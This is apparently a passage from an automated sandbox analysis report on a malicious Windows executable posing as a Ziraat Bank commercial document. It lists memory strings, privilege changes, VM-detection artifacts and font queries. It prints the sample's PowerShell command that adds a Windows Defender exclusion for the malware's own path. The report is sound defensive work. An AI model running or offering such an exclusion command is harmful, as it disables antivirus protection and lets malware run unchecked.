          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd015482333e8d
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcf26c929e065d
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd12ede91e4116<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcfc0bb3f6adf3
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dce75dc8dac505
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd0dae88b38925<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dce24a674e955f
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcf9ff7eb9cfd7
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd06ce01d0608b<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcf2245aff2ed4
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd1898e07eb2d9<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd2c1a7f74b2f8<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcf17a3acb6994
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4153410722.0000000001586000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dce902fceca989
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000000.00000002.1739949343.0000000000A48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcef39c6ad8204
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd11117b97e492<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000038B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd30415be88eca<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003835000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd2f544035f056<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dce12ecfdbceae
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd03cc8c45aec3
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.00000000032CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dcf1d37b977030
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd1165e66f96a5<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd0d0d033d72a3<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd10bcc08ff78f<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003835000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd2dc74955c8b5<
          Source: ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe, 00000003.00000002.4154364843.0000000003525000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $zqEmultipart/form-data; boundary=------------------------8dd12ab3d99a9fe<
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeCode function: 3_2_06F3CE20 LdrInitializeThunk,3_2_06F3CE20
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe"
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe"Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe"Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeProcess created: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe "C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe"Jump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
